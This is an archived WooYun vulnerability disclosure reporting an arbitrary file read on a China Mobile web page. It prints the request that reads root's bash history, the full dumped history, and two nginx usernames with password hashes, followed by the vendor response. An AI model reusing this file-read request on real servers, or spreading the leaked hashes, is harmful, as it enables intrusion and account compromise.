中国移动某站任意文件读取

admin
admin
admin
139653
文章
114
评论
2017年4月22日05:31:19评论320 views字数 219阅读0分43秒阅读模式
摘要

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-05-05: 细节向核心白帽子及相关领域专家公开
2016-05-15: 细节向普通白帽子公开
2016-05-25: 细节向实习白帽子公开
2016-06-09: 细节向公众公开

漏洞概要 关注数(8) 关注此漏洞

缺陷编号: WooYun-2016-198788

漏洞标题: 中国移动某站任意文件读取

相关厂商: 中国移动

漏洞作者: 小川中国移动某站任意文件读取

提交时间: 2016-04-21 13:30

公开时间: 2016-06-09 16:20

漏洞类型: 敏感信息泄露

危害等级: 中

自评Rank: 8

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 敏感信息泄露

1人收藏

漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-05-05: 细节向核心白帽子及相关领域专家公开
2016-05-15: 细节向普通白帽子公开
2016-05-25: 细节向实习白帽子公开
2016-06-09: 细节向公众公开

简要描述:

中国移动某站任意文件读取

详细说明:

root权限,可以读取历史命令

http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/root/.bash_history

cd

cd

ls

cd /

find ./ -name 'nginx*'

cd ./usr/local/nginx

ls

cd sbin

ls

./nginx -v

ps -ef|grep nginx

cd ..

ls

cd conf

ls

cat nginx.conf

vi nginx.conf

ls

cd ..

ls

cd sbin

ls

./nginx

ifconfig -a

ls

cd ..

ls

cd conf

ls

vi nginx.conf

ls

ps -ef|grep nginx

cd ..

ls

cd bin

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

ps -ef|grep nginx

./nginx -s stop

ps -ef|grep nginx

./nginx

ps -ef|grep nginx

ifconfig -a

ls

export TMOUT=0

ls

cd /

find ./ -name 'nginx'

cd usr

cd local

cd nginx

ls

cd conf

ls -ltr |wc -l

ls

ls -ltr

cat nginx.conf.default

ls

pwd

ifconfig -a

cd ..

ls

cd html

ls

cd ..

ls

pwd

cd html

ls

cd ..

ls

find ./ -name 'emapdomains*'

cd client_body_temp

ls

cd ..

ls

cd fastcgi_temp

ls

cd ..

ls

cd proxy_temp

ls

cat 1

cd 1

ls

file 00

cd 00

ls

cd ..

ls

cd ..

ls

cd ..

ls

cd scgi_temp

ls

cd ..

ls

cd uwsgi_temp

ls

cd ..

ls

cd on

ls

cd conf

ls

ls -ltr

cat mime.types

ls -ltr|wc -l

ls -ltr

cd

cd etc

cd /etc

ls

cat hosts

cat resolv.conf

cd /usr/local

cd nginx

ls

cd conf

ls

cat nginx.conf

cat upstream.conf

cat nginx.conf

ls

more proxy.conf

ls -ltr

cat proxy.conf

ls -ltr

cat upstream.conf

cd

ls

cd /

find ./ -name '*emapdomains*'

ls

cd /usr/local

ls

cd nginx

ls

cd conf

ls

grep emapdomains *

ls

cd ..

ls

cd logs

ls

pwd

cd ..

ls

cd conf

ls

ls

pwd

ifconfig -a

ls

cd ..

ls

tar cvf ../nginx_conf_byld_20160113.tar conf

ls

cd ..

ls

ls

export TMOUT=0

ls

ps -ef|grep nginx

cd /

find ./ -name

find ./ -name 'nginx*'

pwd

find ./ -name '**.**.**.**'

cd /usr/local

cd nginx

ls

cd conf

ls

cat nginx-conf

ifconfig -a

ls -ltr

cd key

ls

cd ..

ls

cat ngx_passwd

pwd

cd /usr

ls

cd local

ls

cd bushu

cd nginx

ls

cd

cd /

ls

find ./ -name 'configure'

more ./home/Nginx/pcre-8.35/configure

!

ls

ls

ls

cd

ls

cd ..

ls

cd /usr

ls

cd local

ls

cd sbin

ls

cd ..

ls

cd nginx

ls

cd conf

ls

cd ..

ls

cd logs

ls

ls -ltr

cd data

ls

cat *

cd

ls

ls

cd /usr

cd local

ls

cd nginx

ls

cd conf

ls

cat upstaream.conf

more upstream.conf

ls

more nginx.conf

ls

more upstream.conf

cd ..

ls

cd sbin

ls

./nginx

ps -ef|grep nginx

export TMOUT=0

cd /usr/local/nginx

cd /etc/init.d

ls

cd ..

vi hosts

cd /usr/local/nginx

ls

cd conf/

ls

cat upstream.conf

cd /etc/init.x

cd /etc/init.d

vi nginx

ps -ef | grep ngixn

ps -ef | grep nginx

cd /usr/local

ls

cd nginx

ls

cd conf

ls

ls -ltr

more nginx.conf

vi nginx.conf

ifconfig

exit

cd /usr/local

ls

cd nginx

ls

pwd

cd html

ls

ls -ltr

cd ../conf

ls

vi nginx.conf

ifconfig

cd /usr/local

ls

cd nginx

ls

ls -ltr

cd conf

ls

vi nginx.conf

ls

cd /usr

cd local

ls

cd nginx

ls

ps -ef|grep nginx

cd logs

ls -ltr

tail -f access-bassapp.log

ls -ltr

grep mbomc access-bassapp.log

grep mbomc access.log

cd ..

ls

cd conf

ls

vi nginx.conf

;s

ls

cd /usr

cd local

ls

cd nginx

ls

cd logs

ls -ltr

tail -f access.log

ls -ltr

tail -10000f access-mbomc.log

cd /usr

cd local

cd nginx

ls

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

cd /

find ./ -name 'Squid'

find ./ -name Squid

find ./ -name squid

ps -ef|grep squid

export TMOUT=0

ls

cd /usr

ls

cd local

ls

cd nginx

ls

cd conf

ls

vi nginx.conf

vi nginx.conf

ls

cd ..

ls

ls

export TMOUT=0

ls

cd conf

ls

ls -ltr

exit

ls

ls -ltr

ls

cd /usr

ls

cd local

ls

cd nginx

ls

cd conf

ls

vi nginx.conf

ls

cd ../sbin

ls

./nginx -s stop

vi /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

exit

ls

export TMOUT=0

ls

cd /usr

ls

cd local

ls

cd nginx

cd conf

ls

vi upstream.conf

pwd

ifconfig -a

pwd

cd ../sbin

ls

./nginx -s stop

ps -ef|grep nginx

ls

cd ..

ls

cd conf

ls

vi upstream.conf

cd ../sbin

ls

./nginx -s stop

cd ../conf

ls

vi upstream.conf

cd ../sbin

ls

./nginx -s stop

ps -ef|grep nginx

pwd

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

exit

ls

cd /usr/local

cd nginx

cd conf

vi nginx.conf

cd ../sbin

./nginx -s reload

ps -ef|grep nginx

cd /usr/local/nginx

cd conf/

vi nginx.conf

vi nginx.conf

cd ../sbin/

ls

./nginx -s reload

vi ../conf/nginx.conf

./nginx -s reload

cd ../conf/

ls

vi upstream.conf

vi ../conf/nginx.conf

cd ../sbin/

./nginx -s reload

exit

ipconfig -a

ipfongi

ipconfig

ifconfig

uname -a

top

ifconfig

ls

uname -a

ps

ssh root@**.**.**.**

ls -ltr

ls -ltr /usr/local/nginx/sbin/nginx*

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx.conf

ps -ef|grep nginx

cd

ls

cd ..

ls

cd /home

ls

cd live800

ls

cat startLive800Server.sh

./startLive800Server.sh

ps -ef|grep tomcat

ifconfig

ifconfig |more

netstat -rn

ping **.**.**.**

ssh **.**.**.**

who

ls

cd /

find ./ -name squid

cd ./etc/squid

ls

pwd

cd ./usr/sbin/

cd /

cd ./usr/sbin/

ls

./usr/sbin/squid -s

cd /

/usr/sbin/squid -s

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

exit

cd /

find ./ -name 'squid'

/usr/sbin/squid -s

ps -ef|grep squid

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

more nginx.conf

ls

more nginx.conf

exit

cd /usr/local/nginx

ls

cd conf/

vi nginx.conf

cd ../sbin

./nginx -s reload

cd ..logs

cd ../logs

ls

tail -f access.log

cd ..

cd conf/

ls

vi upstream.conf

cd ../sbin/

./nginx -s reload

exit

ls

ls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

more nginx.conf

ls

cd

ls

ls

ps -ef|grep nginx

/usr/local/nginx/sbin/nginx -s reload

ps -ef|grep nginx

exit

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

cd ..

ls

cd logs

ls

ls -ltr

tail -f access.log

ping **.**.**.**

tail -f access-mbomc.log

ping **.**.**.**

ping **.**.**.**

ls

export TMOUT=0

ls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

ls -ltr

cd ..

ls

cd logs

ls

ls -ltr

tail -1000f access-mbomc.log

LS

ls

ls -ltr

tail -f access-mbomc.log

ls

ls -ltr

tail -f access-mbomc.log

ls -ltr

ipconfig -a

ifconfig -a

ssh root@**.**.**.**

ssh root@**.**.**.**

cd

ls

cd /usr/local/nginx

ls

cd conf

ls

more nginx.conf

ls

ifconfig -a

uname -a

ls

pwd

cd /home

ls

cd live800

ls

cd working

ls

cd tomcat

ls

ls

cd /

find ./ -name 'live800'

cd ./home/live800

ls

cd ./home/live800/working/tomcat/live800

ls

cd working

ls

cd tomcat

ls

cd ..

ls

cd ..

ls

more startLive800Server.sh

cd ../tomcat/

ls

cd working

ls

cd tomcat

ls

ls -ltr

cd webapps

ls

cd live800

ls

pwd

cd /home/live800/working/tomcat/webapps/live800

cd live800

]

ifconfig -a

uname

cd /home

ls

cd /live800

cd live800

ls

startLive800Server.sh

sh startLive800Server.sh

ps -ef|grep live800

ps -ef|grep nginx

cd /usr/local

ls

ls

cd /usr/local

ls

cd gninx

cd nginx

ls

cd sbin

ls

pwd

export TMOUT=0

cd ..

ls

cd conf

ls

pwd

cd

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

ls

cd /home

cd live800

ls

ls -ltr

cd working

ls

ftp **.**.**.**

cd /home

cd live800

ls

cd /work

cd /working

ls

cd working

ls

cd tomcat

ls

cd live800

ls

cd chatClient

ls

cd chinamobile

ls

cd scripts

ls -F

cd chatbox.js

ls

ls -F

ls -l

cd

ls

cd /home

ls

cd live800

ls

cd working

ls

cd tomcat

ls

cd tomcat

ls

cd ..

ls

cd tomcat

ls

cd webapps

ls

ls -ltr

cd live800

ls

ls -ltr zxkf_index.jsp

ls -ltr *index.jsp*

more index.jsp

more showAccount.jsp

more showAccount.jsp

ls -ltr chatbox.jsp

ls

cd chatClient

ls

more chatbox.htm

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

more nginx.conf

ls

ls -ltr

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

vi nginx.conf

cd ..

ls

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

exit

ps -ef | grep ngix

ps -ef | grep ng

ps -ef|grep nginx

cat /usr/local/nginx/conf/nginx.conf

env

ls

find . -name | grep 'index2'

find . -name *.* | grep 'index2'

find . -name 'index2'

find . -name 'index2'pwd

cd ..

ls

find . -name 'index2'

find . -name 'index2.jsp'

cat ./sys/devices/system/cpu/cpu15/cache/index2

cd ./sys/devices/system/cpu/cpu15/cache/index2

ls

cd ..

ls

cd

cd ..

ls

find . -name 'index2.jsp'

cd /home

cd /live800

ls

cd live800

ls

cd working

ls -l

cd tomcat

ls -l

cd webapps

ls

cd live800

ls -l

ls

ls

ls

cd /home

ls

cd live800

ls

cd working

ls

ps -ef|grep nginx

cd /usr/local/nginx/sbin/

./nginx -s reload

export TMOUT=0

./nginx -s reload

ls

cd ..

ls

cd conf

ls

vi nginx.conf

cd ..

ls

cd sbin

./nginx -s reload

cd ..

cd conf

ls

vi nginx.conf

ls

cd /dev

ls

cd shm

ls

cdls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

vi nginx.conf

vi proxy.conf

ls

cd cache

cd /cache

ls

cd proxy_temp_path

ls

ls -ltr

pwd

ls -ltr

rm *

ls

cd ..

ls

cd proxy_cache_path

ls

du -sm *

cd 0

ls

cd 00

ls

ifconfig

exit

ls

ls

ps -ef|grep nginx

cd /usr/local/nginx/sbin/

ls

./nginx -s reload

ls

ps -ef|grep nginx

pwd

cd ..

ls

cd client_body_temp

ls

cd ..

ls

cd fastcgi_temp

ls

cd ..

ls

cd html

ls

cd images

ls

cd ..

ls

cd ..

ls

cd on

cd proxy_temp

ls

file 1

cd 1

ls

file *

cd 00

ls

cd ..

ls

cd ..

ls

cd ..

ls

cd scgi_temp

ls

cd ..

ls

cd uwsgi_temp

ls

cd

export TMOUT=0

ssh **.**.**.**

ls

ps -ef | grep nginx

cat /usr/local/nginx/conf/nginx.conf

ls

pwd

ls -A

cd /home

ls

cd /live800

find ./ 'live800'

e ff

ls

sd ..

cd ..

pwd

cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp

find ./'zxkf_index.jsp'

exit

ls

cd /home/live800/working/tomcat/webapps/live800

ls

cd /home/live800/working/tomcat/webapps/live800

ls

find .-name zxkf_index.jsp

cd ..

ls

cd ..

cd ..

ls

pwd

cd ..

cd ..

ls

pwd

cd .

ls

cd ..

find .-name zxkf_index.jsp

cd /home/live800/working/tomcat

ls

cd /restartTomcat.sh

exit

ls

pwd

/home/live800/working/

cd /home

ls

cd /live800

/home/live800/working/tomcat/webapps/live800

cd /home/live800/working/tomcat/webapps/live800

ps -ef|grep live800

ls

cd /home/live800

ls

cd /working

cd /home/live800/working/tomcat/webapps/live800

ps -ef|grep "live800"

ls

pwd

ps -ef|grep live800

ls

pwd

ls -f

find -name/ live800

find

ls

pwd

cd /home

ls

cd /weblogic

pwd

ps -ef| grep live800

ls -A

ls -a

ls

cd /home/live800/working/tomcat/restartTomcat.sh

cd /home/live800/working/tomcat/

ls

ls -a

pwd

find /-name live800

ls

cd /live800

find /-name "zxkf_index.jsp"

pwd

cd..

cd ..

cd

pwd

history 20

history 50

exit

ls

history 50

ls

pwd

ls -A

cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp

cd /SDSSO

ls

ls

ls -a

看到个http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/usr/local/nginx/conf/ngx_passwd

zhangyong:2RsUTTsvOmOdA

zengqh:DunTiVFkBxz7A

应该该是nginx的登录密码

漏洞证明:

修复方案:

升级

版权声明:转载请注明来源 小川@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-04-25 16:18

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-21 14:20 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习,多挖洞!)

    0

    前排求关注!

  2. 2016-04-21 15:47 | 变色龙 ( 路人 | Rank:2 漏洞数:2 | 好好学习,天天向上。)

    0

    泄露啥重要资料?

  3. 2016-05-22 09:35 | sutdy ( 普通白帽子 | Rank:113 漏洞数:37 | 0.0)

    0

    提醒:级别足够但是无法查看 Rank 高于自己的白帽子漏洞 ( 可以等待进一步公开或者支付 4 个乌云币提前查看

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin